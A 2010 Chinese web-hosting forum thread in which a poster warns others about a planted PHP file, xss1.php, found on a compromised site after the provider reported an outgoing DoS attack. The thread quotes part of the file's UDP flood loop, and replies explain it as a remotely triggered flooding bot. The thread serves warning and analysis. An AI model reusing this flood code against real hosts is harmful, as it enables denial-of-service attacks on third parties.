发一个php 攻击代码.大家注意.
sweat.gif今天收到服务商的警告.说有outgoing dos attack.并给了几个IP让我检查.
检查后发现一个用户的网站应该是被挂马,许多目录下存在这样一个文件: xss1.php,里面的内容如下:[*] $max_time){ break; }
[*]$fp = fsockopen("udp://$ip", $rand, $errno, $errstr, 5);
[*]if($fp){ fwrite($fp, $out);
[*]fclose($fp); }}
[*]echo "Packet complete at ".time('h:i:s')." with $packets (" . round(($packets*65)/1024, 2) . " mB) packets averaging ". round($packets/$exec_time, 2) . " packets/s \n";?>复制代码请勿用于非法用途
[ 本帖最后由 诡谲 于 2010-12-4 12:19 编辑 ] 表示看不懂代码的我路过。
loveliness.gif
这个应该不是马吧!都是代码!没连接地址! 用socket而已,可以禁用的。 难道这是dos?? 这个是被挂的马吧?
相当于个小“僵尸”了,呵呵,接受黑客的URL输入参数IP向该IP的端口发UDP Flood攻击。。
网站有上传功能的应该小心。
[ 本帖最后由 liheyuan 于 2010-12-4 12:30 编辑 ] 这是端口扫描。 呃,看错了,看到65535就自动默认了。。第一行:这个程序不限时,一直执行完毕
第二行:这个程序不理会使用者是否关闭浏览器,都会在服务器端执行完毕
后面是fsockopen提交。。。。
去D别人的吧 还是隐藏吧。无聊的人太多了 学习中,
lol.gif